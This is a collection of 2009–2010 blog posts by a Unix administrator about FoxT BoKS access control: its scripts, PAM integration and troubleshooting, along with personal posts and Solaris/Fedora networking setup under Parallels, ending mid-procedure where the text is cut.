After discussing the matter with FoxT tech support I was reminded of the aforementioned design decision regarding DoS attacks: FoxT doesn't want you to easily block another person's account by just slamming his password. Which is why they decided that anybody who is allowed to use SSH key pairs should also be allowed to keep logging in despite his "locked" status.

Two very important distinctions:

  1. This does not apply to manual account locks! So if an administrator locks an account, the account will not be allowed to login at all, SSH keys or not.
  2. To quote my contact at FoxT: a successful key-based login will not reset the failed password count of the account, and will not open up additional opportunity for an attacker to keep trying the password. Both points are very important.

kilala.nl tags: , ,

View or add comments (curr. 0)

FoxT BoKS training and documentation

2010-07-06 19:25:00

I've been asked multiple times who can provide training or education about FoxT's BoKS Access Control. The most obvious answer is: "it depends on where you live".

FoxT has many local partners across the globe, offering many different services. Project management, consulting, administration and training, the works! Who these local partners are depends on the continent and/or country you're in.

In the case of the Benelux (Belgium, the Netherlands and Luxembourg) there are two answers.

  1. You can hire FoxT to come down from Sweden
  2. You can hire Unixerius, the only local partner for BoKS training.

For information about local training partners in your locale, please contact FoxT.


kilala.nl tags: , ,

View or add comments (curr. 0)

End of life for BoKS 5.x, 6.0 and 6.1

2010-06-19 00:00:00

 

A few months ago FoxT made their official announcement regarding the EOL-ing of various BoKS versions within the next 1.5 years.

Per the 31st of December 2010, the following products will no longer receive support.

Also, per the 31st of December 2011, the following products will no longer receive support.

Per the aforementioned dates "no more maintenance updates or patches will be made available and no further development will take place for these particular components. In addition, the affected components will no longer be supported by FoxT Customer Support".

Please keep these dates in mind and plan your upgrade paths accordingly! You don't want to get stuck with an unsupported version of the software because you'll miss out on critical software updates and tech support costs will go through the roof. Then again, in this day and age, why are you still running a version < 6.0?!

Gentlemen, start your upgrades!

 


kilala.nl tags: , ,

View or add comments (curr. 0)

Digital content delivery: I believe in it

2010-06-11 18:25:00

iPads as e-readers

I sincerely have the utmost faith in digital content delivery. Over the past year we've seen a huge rise in sales of e-readers, which is a great step forward. But we're not there yet! Call me an Apple fanboy if you will, but I do believe the iPad is the next step and who knows what the future will bring after that?! I hear good things about e-ink color screens!

Either way, those things are simply used to carry and present the important bit: content. And how does it get on there? Delivery through the Internet! So far it's working wonderfully on my iPhone.

I've been using Comixology's Comics to both purchase and consume comic books. The buying process couldn't be simpler and IMO pricing is very fair. Most comics ring in at 0.79 euros, with the more popular Marvel comics running 1.59 euros. Choose comic, enter password, download, read. It's wonderfully easy and the Comics app has opened my eyes to a lot of new comics. One of my new favorites is Fearless Dawn.

On a more serious note I'm loving PressReader, which gives you access to 1000+ international newspapers. And I don't mean an aggregation of their online content, but the actual full PDFs of each newspaper. The application itself is free and comes with seven free issues of any paper of your choosing. The economy subscription to PressReader runs $9.95 and gives you access to 31 issues each month, allowing you to mix and match any papers you would like. There are also more expensive subs, or you can pay as you go at $0.99 per paper.

The economy sub is actually cheaper than most of the online-only subscriptions to Dutch newspapers. PR gives access to the Volkskrant and the NRC, both of which have a more expensive online-only sub. Only NRC runs cheaper, but only if you pay per year instead of per month. Either way, I love reading the paper through PR and assume that it'll only be nicer on the much bigger iPad screen.

Personally I'm sold on on-demand content delivery through the Internet.


kilala.nl tags: , ,

View or add comments (curr. 2)

Evaluation of my NLUUG presentation

2010-06-05 11:32:00

Wow, what a fright! Earlier this week I received an email from the NLUUG conference staff which contained the evaluation of all presentations. Mine was listed with the lowest grade of all at a sucky 5.0. What an awful scare! O-O

I had no clue what'd gone wrong. Sure, I'd talked too fast, cutting the presentation short. And yeah, one guy'd told me it was a borderline sales pitch. But overall I thought things'd gone pretty well and I'd gotten some positive reactions!

Eager to hear what went wrong I asked the staff for some more details. Had visitors provided any specific, written feedback? This would of course be a prime learning opportunity! Well, unfortunately such a thing was not available. But! It turns out that, out of fifty attendants, only two people had actually filled out the evaluation. So my 5.0 was based on just 4% of the attendants. *phew* That's a bit of a relief :)

On the 22nd I'll be repeating my presentation at the USN monthly get-together. Sounds like fun :)


kilala.nl tags: ,

View or add comments (curr. 2)

NLUUG: we had a good day

2010-05-06 22:33:00

Ehhh. Ehhh... *shrug* I've got some mixed feelings about today.

While my presentation's reception was at least more than lukewarm, our exhibitor's booth was pretty damn quiet. It might've been the location, it might've been the backdrop, it might've been my suit... I dunno. I think we spoke to maybe ten people who weren't ex-colleagues or acquaintances of mine. So, nothing spectacular, but a good day nonetheless.

The great thing about today is that I finally got to meet Adri (a regular reader of my blog and a fellow father-of-a-1.5-year-old-girl) in person. *waves* Thank you very much for the great book you brought me Adri! It's awesome! ^_^


kilala.nl tags: , ,

View or add comments (curr. 1)

NLUUG: as ready as we'll be

2010-05-05 22:08:00

The Unixerius booth

Tomorrow's the big day! I'll be presenting at the NLUUG VJ-2010 convention, introducing the attendants to BoKS. I was told to expect a maximum of 80 people in my room, which is kind of reassuring.

Yesterday my colleague Kees and a friend of his built the Unixerius booth which looks smashing, although I personally think it's a bit overkill. I mean, we're bound to get a question like "Say, what's the name of your company again?"


kilala.nl tags: , ,

View or add comments (curr. 3)

The trial went alright

2010-04-20 22:06:00

So, just as a short update: the trial of my BoKS presentation at Proxy went fine :)

I -love- their new office, which is actually housed in a rather old, monumental building that has been restored and redecorated. Very nice! I was very anxious all day leading up to the talk, but when I was up there in front of the group everything came naturally. It really helps that I've already done the talk six or seven times, just by myself. It's made the story stick in my head.

Funnily enough I also met the gentleman who'll be gophering the room my talk at NLUUG will be in. :)


kilala.nl tags: , ,

View or add comments (curr. 0)

A lesson I'd do well to learn

2010-04-16 05:52:00

... not because I'm going to work in Japan, but because even in the Netherlands it would be quite, quite helpful.

Quoting Hiko who is giving tips to survive in the Japanese workplace.

There are times in our lives that we have had the joy of letting rip with a phrase of self righteous condemnation like [this is bulls**t!]. Look back and remember those times. Savor them, and cherish them knowing that so long as you are in Japan and wish to remain employed and an unstigmatized non-social-outcast, you will never be able to have memories like that ever again, unless the story ends "and so then I was fired, and left Japan and overall I was a better person for the experience". Japan is a pathologically non-confrontational culture. All that bottled up indignation and rage tends to get released as passive aggression, or internalized into digestive-tract disorders. The best solution is to learn to undo your reflex to want to butt heads and learn how to resolve conflict the Japanese way.


kilala.nl tags: , ,

View or add comments (curr. 4)

Practicing my presentation

2010-04-12 21:56:00

The big presentation at NLUUG is three weeks away and I've been practicing my presentation. Next week I'll do a preview / trial run at Proxy Services, to get into the groove. To be honest I'm quite anxious about the whole deal. *shudder*


kilala.nl tags: ,

View or add comments (curr. 4)

Check_boks_dormant.ksh: Finding unused and inactive user accounts

2010-03-16 22:02:00

Users come and users go and likewise user accounts get created and destroyed. However, sometimes your HR processes fail and accounts get forgotten and left behind. It may not be obvious, but these forgotten accounts can actually form a threat to your security and should be cleaned up. Many companies even go so far as to lock or remove accounts of people who are still actively employed, if those accounts go unused for an extended period of time.

This script will help you find these forgotten user accounts, so you can then decide what to do with them.


Usage of check_boks_dormant

./check_boks_dormant [[-u UC] [-H HG] [-h HOST] | -A] [-M MON] [-x UC] [-X HG]  [-d -o FILE] [-f FILE]

-u UCLASS	Check only accounts with profile UCLASS. Multiple -u entries allowed.
-H HGROUP	Check only accounts from HOSTGROUP. Multiple -H entries allowed.
-h HOST		Check ALL accounts involved with HOST. Multiple -h entries allowed.
-A 		Check ALL user accounts.
-M MON		Minimum amount of months that accounts must be dormant. Default is 6.
-x EXCLUDEUC	Exclude all accounts with profile UCLASS. Multiple -x entries allowed.
-X EXCLUDEHG	Exclude all accounts from HOSTGROUP. Multiple -X entries allowed.
-S 		Exclude all accounts who can authenticate with SSH_PK. See "other notes" below.
-f FILE		Log file that contains all dormant accounts. Default logs into $BOKS_var.
-d 		Debug mode. Provides error logging. 
-o FILE		Output file for debugging logs. Required when -d is passed.

When using the -h option, a list will be made of all user accounts involved with this server
regardless of user class or host group. One can exclude certain classes or groups by using
the -x and -X parameters.

Example: 
./check_boks_dormant.ksh -h solaris1 -x RootUsers -x DataTransfer
./check_boks_dormant.ksh -u OracleDBA
./check_boks_dormant.ksh -A -d -o /tmp/foobar
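
If you want to run this check on a schedule, a crontab entry along these lines would do (just a sketch; the install path and log location are assumptions):

# At 06:00 on the 1st of every month, check all accounts dormant for 6+ months
0 6 1 * * /opt/scripts/check_boks_dormant.ksh -A -M 6 -f /var/tmp/dormant_accounts.txt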

Output

The script does not output to stdout. Instead, all dormant accounts are logged in $BOKS_var/check_boks_dormant.ksh.DATE or another file specified with -f.

The log file in $BOKS_var (or specified with -f) will contain a list of inactive accounts.


Limitations


Other notes

Download

Download check_boks_dormant.ksh
$ wc check_boks_dormant.ksh
     482    2559   17139 check_boks_dormant.ksh

$ cksum check_boks_dormant.ksh
2919189107 17139 check_boks_dormant.ksh

kilala.nl tags: , ,

View or add comments (curr. 1)

Check_boks_replication - Script for monitoring BoKS database replication

2010-03-16 21:43:00

In a BoKS infrastructure the master server automatically distributes database updates to its replicas. BoKS provides the admin with a number of ways to verify the proper functioning of these replicas, but none of these is easily hooked into monitoring software.

This script makes use of the following methods to verify infra sanity:

* boksdiag list, to verify if replicas are reachable.
* boksdiag sequence, to verify if a replica's database is up to date.
* dumpbase -tN | wc -l, to verify the actual files on the replicas.


Usage of check_boks_replication

./check_boks_replication [-l LAG] [-h HOST] [-n] [-d -o FILE]
-l LAG		Maximum amount of updates for a replica table to be behind on.
		Typically this should not be over 50. Default is 30.
-h HOST		Hostname of individual replica to verify.
-x EXCLUDE	Hostname of replica to exclude.
-p		Disable the use of ping in connection testing, in case of firewalls.
-n		Dry-run mode. Will only return an OK status.
-d		Debug mode. Use with dry-run mode to test Tivoli.
-o FILE		Output file for debugging logs. Required when -d is used.
 
Example: ./check_boks_sequence -l 20 -d -o /tmp/foobar

Multiple -h and -x parameters are allowed.

Output

This script is meant to be called as a Tivoli numeric script. Hence both the output and the exit code are a single digit. Please configure your numeric script calls accordingly:

0 = OK
1 = WARNING
2 = SEVERE
3 = CRITICAL
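
If you'd rather hook this into Nagios than Tivoli, a thin wrapper that remaps the digit to Nagios exit codes will do. A minimal sketch (the script path and the exact WARNING/CRITICAL mapping are my own assumptions):

#!/bin/ksh
# Wrap check_boks_replication.ksh for Nagios: remap its single-digit status.
STATUS=$(/opt/scripts/check_boks_replication.ksh -l 30)
case "$STATUS" in
    0) echo "OK - replication in sync";              exit 0 ;;
    1) echo "WARNING - check the script parameters"; exit 1 ;;
    2) echo "CRITICAL - replica out of sync";        exit 2 ;;
    3) echo "CRITICAL - replication broken";         exit 2 ;;
    *) echo "UNKNOWN - unexpected status $STATUS";   exit 3 ;;
esac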


Limitations


Download

Download check_boks_replication.ksh
$ wc check_boks_replication.ksh
     570    2668   17878 check_boks_replication.ksh

$ cksum check_boks_replication.ksh
4063571181 17878 check_boks_replication.ks

kilala.nl tags: , ,

View or add comments (curr. 3)

Integrating your applications with FoxT BoKS

2010-02-11 09:16:00

BoKS provides you with an open architecture, allowing you to integrate BoKS access control with your own applications. The easiest way to do this is by using Pluggable Authentication Modules (PAM), provided that PAM is available for your operating system of choice. Aside from PAM one could also make use of the APIs provided by FoxT, though I personally don't have experience with that option.


PAM example: using ProFTPd with BoKS

Recently we needed to get FTP up and running on a system that previously only used SCP/SFTP. However, the Solaris-default FTP daemon was never installed, nor does the BoKS package for Solaris include the BoKS FTP daemon. This left us with a few options, including the installation of ProFTPd.

Simply installing and running ProFTPd would leave us with an unsecured system: anybody would be able to login, because BoKS does not yet have any grip on the daemon. Luckily, the integration with BoKS was very easy, thanks to PAM.

  1. Add the following to proftpd.conf:
    <IfModule mod_auth_pam.c>
    AuthPAM on
    AuthOrder mod_auth_unix.c mod_auth_pam.c*
    </IfModule>
  2. In the same proftpd.conf set "UseIPv6" to "off". (Why?)
  3. Restart proFTPd.

It's that simple. Now, let's take a look at what's needed if you don't use an existing access method.


Integrating an application with a new access method

Each application that makes use of PAM will send an identifier to PAM. For example, most FTP daemons will either identify themselves as "ftp" or "ftpd". You will need to edit /etc/pam.conf..ssm (the pam.conf file used when you run sysreplace replace) and add a set of rules for this new PAM identifier. Usually it's enough to take the ruleset defined for FTP and then to adjust the identifier to your own.

Once your pam.conf has been modified, you need to add a new entry to $BOKS_etc/bokspam.conf that ties the new PAM identifier to a BoKS access method. You are free to choose your own method string, as long as it doesn't already exist in $BOKS_etc/method.conf. For applications that simply take an incoming network request it's easiest to copy the line for FTP and set it to your new application.

On the master+replicas and the BoKS clients in question you will finally need to edit $BOKS_etc/method.conf. There you will define the format of access routes for this new method, as well as any modifiers that you desire.

And to my knowledge that's it!

  1. App points to PAM
  2. PAM points to BoKS
  3. bokspam.conf points to access method
  4. method.conf defines access method
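
To illustrate steps 1 and 2 of that checklist: the pam.conf ruleset you copy could end up looking roughly like this. This is only a sketch in Solaris pam.conf syntax; "myapp" is a made-up PAM service name, and you should copy the actual module lines from the existing "ftp" entries in your pam.conf..ssm rather than trust my placeholder.

# "myapp" is the identifier your application sends to PAM (hypothetical).
# Replace <boks_pam_module> with the module path used by the ftp entries.
myapp   auth      required   <boks_pam_module>
myapp   account   required   <boks_pam_module>
myapp   session   required   <boks_pam_module>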

kilala.nl tags: , ,

View or add comments (curr. 0)

Apparently writing doesn't always come easy

2010-02-04 15:28:00

So far I'm about fifteen hours into writing the paper that goes with the presentation I will be giving at the NLUUG convention. It's been a while since I wrote an extensive article in English and by $DEITY does it show! I -hate- my writing! There's nothing wrong with my vocabulary, yet I seem to reuse the same words over and over again! There's maybe a dozen words that get used frequently and after reading a page or two it becomes very noticeable. Like I'm constantly stammering "uhhmm", but differently. :/

I feel like that kid from Little Man Tate, doing the show-and-tell (at first I thought it was from Two stupid dogs ^_^ ).

"Clipper Ships" by Matt Montini.

Me and my dad make models of clipper ships. I like clipper ships because they are fast. Clipper ships sail the ocean. Clipper ships never sail on rivers or lakes. Clipper ships have lots of sails and are made out of wood.

Well, first I'll make sure that the story itself's finished. Then I can get started on applying spit&polish. My brain needs a frggin' thesaurus :)


kilala.nl tags: , ,

View or add comments (curr. 1)

How exciting! I'll be presenting at NLUUG

2010-01-31 07:46:00

The NLUUG logo

Yesterday I received an email from the NLUUG (dutch Unix users group) conference bureau:

Dear Thomas,

We have received your abstract for the NLUUG spring conference 2010. We would like to thank you for your submission and your patience.

It is our pleasure to inform you that your abstract has been chosen by the program committee to be presented on May 6th.

Holy carp! This means that I'll be getting on stage, in front of 50-200 Unix admins, my peers if you will. The last time I got in front of a big crowd it was thirty high school juniors, so this is going to be just a -little- bit different. =_=;

Yeah, this is a little scary, aside from being uber-exciting :)


kilala.nl tags: , ,

View or add comments (curr. 8)

Some of my favourite iPhone apps (2)

2010-01-31 06:57:00

iPhone app icons

A little over a year ago I made a list of iPhone apps that I found particularly good, just to share the love. These applications are much better than most of the 140k apps available and, though all of them are paid-for apps, they are well worth getting!

AirVideo, stream video from your Mac/PC to your iPhone/iPad. It supports -ALL- video formats, by performing live conversion, so you can watch -anything- on the go!

Comics, buy and read comic books. Reading is made a very nice experience, because the app takes things one image at a time instead of dumping the whole page on screen.

Dropbox, I've written about this before. It allows me access to my online file storage, which is synced to all my Macs/PCs. I read comics with the above Comics, watch anime with AirVideo and I read manga and PDFs using Dropbox. What a team!

Zombieville USA and OMG Pirates!, both great side-scrolling fighters by MikaMobile. Zombies, ninjas and pirates, what else do you need?!

Minigore, a frantic, top-down shooter. Easy to pick up, difficult to master.

Orbital, a relaxing and great looking puzzler. Again, easy to play, yet very hard to master.

Sudoku unlimited, as far as I'm concerned the -best- sudoku app because of its "Newspaper" theme. Looks great, plays great.

So, from the list it should be apparent that I play a lot of games on my iPhone. These games are great for a short pickup-and-play during small "cigarette breaks" at the office and during my daily commute.

Mind you, now that Apple have introduced their new iPad I imagine some great productivity tools to come out as well!


kilala.nl tags: , , ,

View or add comments (curr. 2)

Check_boks_queues: Tracking the status of your BoKS clntd queues

2010-01-13 06:33:00

Every time a BoKS client becomes unreachable the master server will retain updates for this client in a queue. Over time this queue will continue to grow, containing all manner of updates to /etc/passwd, /etc/shadow and so forth. Without these updates the client will become out of date and known-good passwords will stop working. You could lose access to the root account if you don't keep a history of the previous passwords!

This simple Tivoli plugin will warn you of any client queues that exceed a certain size or age, with both thresholds adjustable from the command line.


Usage of check_boks_queues

./check_boks_queues [-m MESS] [-a AGE] [-d -o FILE] [-f FILE]

-m MESS		Threshold for amount of messages. Default is 40 messages.
-a AGE		Threshold for age of client queue. Default is 24 hours.
-f FILE		Log file that lists queues that are over threshold. Default logs into $BOKS_var.
-d 		Debug mode. Provides error logging. 
-o FILE		Output file for debugging logs. Required when -d is passed.

The -a parameter requires BoKS 6.5.x. It DOES NOT work in 6.0.x and older versions.

Example: 
./check_boks_queues -m 50 -f /tmp/over50.txt
./check_boks_queues -a 168 -f /tmp/oneweek.txt

Output

This script is meant to be called as a Tivoli numeric script. Hence both the output and the exit code are a single digit. Please configure your numeric script calls accordingly:

0 = OK
1 = WARNING
2 = SEVERE
3 = CRITICAL

The log file in $BOKS_var (or specified with -f) will contain a list of queues that are stuck.


Limitations


Download

Download check_boks_queues.ksh
BoKS > wc check_boks_queues.ksh
     299    1413    9307 check_boks_queues.ksh
BoKS > cksum check_boks_queues.ksh
1047961426      9307    check_boks_queues.ksh

kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS troubleshooting: corrupt message queues

2010-01-12 20:36:00

Today I ran into a problem I hadn't encountered before: seemingly out of the blue, one of our BoKS client systems would not allow anyone to login. The console showed the familiar "No contact with BoKS. Only "root" may login." message. The good thing was that the master could still communicate with the client through the clntd channel, so at least I could do a sysreplace restore through cadm -s.

We were originally alerted about this problem after the client in question had started reporting that its /var partition had reached 100%. After logging in I quickly saw why: for over 24 hours the bridge_servc_s process had been dumping core, with hundreds of core dumps in /var/core. This also explained why logging in did not work, while master-to-client comms were still OK. /var/adm/messages also confirmed these crashes, showing that the boks_bridge process kept on restarting and dying on a SIGBUS signal.

The $BOKS_var/boks_errlog file showed these messages between a restart and a rekill of BoKS:

boks_init@CLIENT Tue Jan 12 09:52:09 2010
  INFO: Max file descriptors 1024
boks_sshd@CLIENT Tue Jan 12 09:52:09 2010
  WARNING: Could not load host key: /etc/opt/boksm/keys/host.kpg
boks_udsqd@CLIENT Jan 12 09:52:09 [servc_queue]
  WARNING: Failed to connect to any server (0/1). Last attempt to ".servc", errno 146
boks_init@CLIENT Tue Jan 12 09:52:09 2010
  WARNING: Respawn process bridge_servc_s exited, reason: signal SIGBUS. Process restarted.
boks_udsqd@CLIENT Jan 12 09:52:10 [servc_queue]
  WARNING: Dropping packet. Server failed to accept it
boks_init@CLIENT Tue Jan 12 09:52:13 2010
  WARNING: Respawn process bridge_servc_s exited to often, NOT respawned
boks_init@CLIENT Tue Jan 12 09:53:26 2010
  WARNING: Dying on signal SIGTERM

This indicates that none of the replicas was accepting servc requests from the client, which again explains why one could not login, nor use suexec etc. Checking the $BOKS_var/boks_errlog file on the replicas explained why the servc requests were being rejected:

%oks_bridge@REPLICA Mon Jan 11 22:41:16 2010
  ERROR: Got malformed message from 192.168.10.113
%oks_bridge@REPLICA Tue Jan 12 01:04:06 2010
  ERROR: Got malformed message from 192.168.10.113
%oks_bridge@REPLICA Tue Jan 12 01:07:46 2010
  ERROR: Got malformed message from 192.168.10.113

And so on... After deliberating with FoxT tech support they concluded that the client must have had a message in its outgoing servc queue that had gotten damaged. They suggested that I make a backup of $BOKS_var/data/crypt_spool/servc and then remove the files in that directory. Normally it's not a good idea to remove these files, as they may contain password-change requests from users, but in this case there wasn't much else we could do. Remember though, leave the crypt_spool directory alone on the master and replicas, because that stuff's even more important!
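
In shell terms the backup-and-clear boils down to something like this. A minimal sketch of what support suggested, to be run on the affected client only, never on the master or replicas (the tar destination is arbitrary):

# Back up the client's outgoing servc queue, then clear it
cd $BOKS_var/data/crypt_spool
tar cvf /var/tmp/servc_queue_backup.tar servc
rm servc/*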

What do you know? After clearing out the message queue the client worked perfectly. I'm now working with FoxT to find out which one of the few dozen messages was the corrupt one. In the process I'm trying to learn a little about the insides of BoKS. For example, looking at the message files it seems that either they were ALL deformed, or BoKS doesn't actually have a uniform format for them, because some contained a smattering of newline characters, while other files were one long line. I'm still waiting for a reply on that question.


kilala.nl tags: , ,

View or add comments (curr. 0)

boks_set_passwd.ksh - Quick and dirty script to set a password

2010-01-11 17:32:00

Sometimes you're in a hurry and need to set a new, random password on an account. Don't feel that your random banging on the keyboard is random enough? Then use this script instead.


Usage of boks_set_passwd

./boks_set_passwd.ksh [HGROUP|HOST]:USER

Example: 
./boks_set_passwd.ksh SUN:thomas
./boks_set_passwd.ksh solaris2:root

Output

Three fields get echoed to stdout: the username, the password and the encrypted password string (should you ever need it).


Limitations


Download

Download boks_set_passwd.ksh
$ wc boks_set_passwd.ksh 
      92     389    2369 boks_set_passwd.ksh

$ cksum boks_set_passwd.ksh 
2167470539 2369 boks_set_passwd.ksh

kilala.nl tags: , ,

View or add comments (curr. 2)

Check_boks_rootpw - Script for monitoring of root password consistency

2010-01-10 21:51:00

In a BoKS domain root passwords are stored in a number of locations. In order to guarantee proper functioning of the root password one will need to verify that the password stored in all three locations is identical. The three locations are:

Brpf in this case stands for "BoKS Root Password File". It is used to allow the root user to login through a system's console if the BoKS client cannot communicate with the master server.

This script uses functionality from the boks_new_rootpw.ksh script to test all three locations of the BoKS root password.


Usage of check_boks_rootpw

./check_boks_rootpw.ksh [[-h HOST] [-H HG] [-i FILE] | -A] [-x HOST] [-X HG]  [-d -o FILE] [-f FILE]

-h HOST		Verify the root password for HOST. Multiple -h entries allowed.
-H HGROUP	Verify the root passwords for HOST GROUP. Multiple -H entries allowed.
-i FILE		Verify the root passwords for all hosts in FILE.
-A 		Verify the root passwords for ALL hosts.
-x EXCLUDE	Hosts to exclude (when using -H or -A). Multiple -x entries allowed.
-X EXCLUDEHG	Host groups to exclude (when using -A). Multiple -X entries allowed.
-f FILE		Log file that lists errors in root password files. Default logs into $BOKS_var.
-d 		Debug mode. Provides error logging. Does a dry-run, not doing any updates.
-o FILE		Output file for debugging logs. Required when -d is passed.

Example: 
./check_boks_rootpw.ksh -h HOST1 -h HOST2 -f $BOKS_var/root.txt
./check_boks_rootpw.ksh -A -d -o /tmp/foobar

Multiple -h, -H, -i, -x and -X parameters are allowed.

Output

This script is meant to be called as a Tivoli numeric script. Hence both the output and the exit code are a single digit. Please configure your numeric script calls accordingly:

0 = OK, everything OK.
1 = WARNING, a wrong parameter was entered.
2 = SEVERE, a root password is inconsistent. Check log file.
3 = CRITICAL, not used.


Limitations


Download

Download check_boks_rootpw.ksh
$ wc check_boks_rootpw.ksh 
     467    2162   14401 check_boks_rootpw.ksh

$ cksum check_boks_rootpw.ksh 
3050878034 14401 check_boks_rootpw.ks

kilala.nl tags: , ,

View or add comments (curr. 2)

Check_boks_ssmactive: Script to verify client BoKS security

2010-01-10 21:44:00

The check_boks_client script checks many different things on a per-client basis. That particular script needs to run locally on the client itself. This script, check_boks_ssmactive, is meant to do one quick check on clients, from the master server. The only thing it checks is whether BoKS security is actually active on the client, which is rather important!

By running this script from the master server you can blanket your whole domain in one blow.


Usage of check_boks_ssmactive

./check_boks_ssmactive [[-h HOST] [-H HG] [-i FILE] | -A] [-x HOST] [-X HG]  [-d -o FILE] [-f FILE]

-h HOST		Verify the BoKS status for HOST. Multiple -h entries allowed.
-H HGROUP	Verify the BoKS status for HOST GROUP. Multiple -H entries allowed.
-i FILE		Verify the BoKS status for all hosts in FILE.
-A 		Verify the BoKS status for ALL hosts.
-x EXCLUDE	Hosts to exclude (when using -H or -A). Multiple -x entries allowed.
-X EXCLUDEHG	Host groups to exclude (when using -A). Multiple -X entries allowed.
-f FILE		Log file that lists hosts with BoKS disabled. Default logs into $BOKS_var.
-d 		Debug mode. Provides error logging. Does a dry-run, not doing any updates.
-o FILE		Output file for debugging logs. Required when -d is passed.

Example: 
./check_boks_ssmactive.ksh -h HOST1 -h HOST2 -f $BOKS_var/BOKSdisabled.txt
./check_boks_ssmactive.ksh -A -d -o /tmp/foobar

Multiple -h, -H, -i, -x and -X parameters are allowed.

Output

This script is meant to be called as a Tivoli numeric script. Hence both the output and the exit code are a single digit. Please configure your numeric script calls accordingly:

0 = OK, everything OK or clients unreachable.
1 = WARNING, a wrong parameter was entered.
2 = SEVERE, one or more hosts are NOT secure. Check log file.
3 = CRITICAL, not used.

The log file in $BOKS_var (or specified with -f) will contain a list of hosts that have BoKS disabled.


Limitations


Download

Download check_boks_ssmactive.ksh
$ wc check_boks_ssmactive.ksh 
     440    2041   13544 check_boks_ssmactive.ksh

$ cksum check_boks_ssmactive.ksh 
3734761991 13544 check_boks_ssmactive.ks

kilala.nl tags: , ,

View or add comments (curr. 0)

Boks_new_rootpw.ksh - Script for automatic changing of root passwords

2010-01-10 20:49:00

This script can be used to generate, set and verify a new password for any root account within your BoKS domain. It could be used as part of your monthly root password reset cycle, or for daily maintenance purposes. Functionality of the script includes:


Usage of boks_new_rootpw

./boks_new_rootpw [[-h HOST] [-H HG] [-i FILE] | -A] [-x HOST] [-X HG] [-f FILE] [-d -o FILE]

-h HOST		Change the root password for HOST. Multiple -h entries allowed.
-H HGROUP	Change the root passwords for HOSTGROUP. Multiple -H entries allowed.
-i FILE		Change the root passwords for all hosts in FILE.
-A 		Change the root passwords for ALL hosts.
-x EXCLUDE	Hosts to exclude (when using -H or -A). Multiple -x entries allowed.
-X EXCLUDEHG	Hostgroups to exclude (when using -A). Multiple -X entries allowed.
-f FILE		Output file to store the new root passwords in. Default is stdout.
-d 		Debug mode. Provides error logging. Does a dry-run, not doing any updates.
-o FILE	Output file for debugging logs. Required when -d is passed.

Example: 
./boks_new_rootpw -h HOST1 -h HOST2 -f $BOKS_var/root.txt
./boks_new_rootpw -A -d -o /tmp/foobar

Multiple -h, -H, -i, -x, and -X entries are allowed.

Output

If you do not use the -f flag to indicate an output file, the script will output everything to stdout. The output consists of a listing of hostname, plus root password, plus encrypted password string. Either way you may want to keep this output somewhere safe, for reference.

When running in debug/dry-run mode, the script outputs log messages to the output file specified with the -o flag. This file will show detailed error reports for failing root updates. BEWARE: THE DEBUG LOG WILL CONTAIN (UNUSED) ROOT PASSWORDS.

All (temporary) files created by this script are 0600, root:root. Duh! ^_^


Limitations


Download

Download boks_new_rootpw.ksh
$ wc boks_new_rootpw.ksh
     525    2549   16959 boks_new_rootpw.ksh

$ cksum boks_new_rootpw.ksh
4078240301 16959 boks_new_rootpw.ksh

kilala.nl tags: , ,

View or add comments (curr. 3)

Hacking BoKS 6.5 to run on Fedora

2010-01-10 15:10:00

The past few weeks I've spent a few hours here and there, trying to get BoKS 6.5 to run on Fedora Core 12. Why? Because FoxT's list of supported platforms only includes commercial Linuxes; the last free version on the list is Red Hat 7. I've asked my contacts at FoxT whether they're looking at converting BoKS for free Linuxes, like Fedora.

Unfortunately my efforts were only partially successful. I've used the base BoKS 6.5.2 package for RHEL, which requires a few tweaks to make it work. In the end I got SSH and SU to work properly, but "su -l" and telnet don't work. You can telnet into the Fedora box, but it's never checked for authorization, though servc on the master does receive the request. Also, "su -l" fails immediately with the message "su: password incorrect" without even asking for my password.

I've compiled a list of about a dozen tweaks and extra packages that are needed to get to this point, but I'm far from having a proper BoKS client on Fedora.


kilala.nl tags: , ,

View or add comments (curr. 1)

Network configuration on Red Hat and Fedora WTF?!

2009-12-05 22:10:00

Why the frag does the IPv4 networking setup on Red Hat and Fedora Linii need to be so damn complicated? I've just spent half an hour Googling to find the right commands to ensure that my Fedora 12 VM in Parallels configures its eth0 at boot time. Seriously, compare the two:

Solaris 10:

1. Enter hostname and IP in /etc/hosts

2. Enter hostname in /etc/hostname.ni0

3. Enter network base IP and netmask in /etc/netmasks

Fedora 12:

1. Run system-config-network. Fill out all details.

2. Enter hostname and IP in /etc/hosts

3. Enter hostname in /etc/sysconfig/network

4. Set "ONBOOT" to yes in /etc/sysconfig/networking/devices/ifcfg-eth0

5. Run: chkconfig --level 35 network on
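
For reference, the end result in that ifcfg-eth0 file looks roughly like this for a static setup (a sketch; the addresses are placeholders):

# /etc/sysconfig/networking/devices/ifcfg-eth0
DEVICE=eth0
BOOTPROTO=static
IPADDR=192.168.1.10
NETMASK=255.255.255.0
GATEWAY=192.168.1.1
ONBOOT=yes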

Seriously, who the fsck comes up with that last line?! I already have the network startup scripts in /etc/init.d and everything in /etc/sysconfig is set up and I -still- need to enable the network config to be loaded at boot time? WTF?! A few years back I had the same fights with setting up static routes that needed to be carried over reboots.

I fscking hate Red Hat.


kilala.nl tags: , ,

View or add comments (curr. 2)

Repairing Solaris 10 networking in Parallels Desktop 5

2009-12-04 18:33:00

The Parallels support team finally came through. Earlier, I reported network problems with Solaris 10 and Parallels Desktop 5. After upgrading to Parallels 5 my virtual NICs were not getting detected anymore and ifconfig was completely unable to plumb my ni0 or ni1 interfaces.

It took us over three weeks of mailing back and forth, but finally the Parallels team were able to both reproduce the issue and to provide a fix. Here's the summary of what tech support told me.

Cause of the problem

Parallels Desktop 5 now supports 64-bit operating systems. Furthermore, it will now by default boot any capable OS into 64-bit mode. This means that all of my Solaris 10 VMs that had been running in 32-bit mode all of a sudden switched over to 64-bit. This also means that any 32-bit only drivers are rendered unusable. This is what broke the usage of Parallels' virtual network interfaces.

Solution 1: forcing the OS back to 32-bit mode

1. Stop the VM

2. Go to VM configuration -> Hardware -> Boot order.

3. In the "boot parameters" field enter: devices.apic.disable=1

3a. Alternatively, add the following to /etc/system: set pcplusmp:apic_forceload = -1

4. Boot the VM.

5. As root run: /usr/sbin/eeprom boot-file="kernel/unix"

Solution 2: recompiling the RTL3829 drivers as 64-bit

1. Start the VM

2. Remove the old drivers. Run: rem_drv ni

3. Mount the Parallels tools CDROM ISO image on /cdrom.

4. Run: cd /cdrom/Drivers/Network/RTL3829

5. Run: cp -rp SOLARIS /tmp

6. Run: cd /tmp/SOLARIS

7. Edit the network.sh file and add the following lines right before the echo of "Compiling driver".

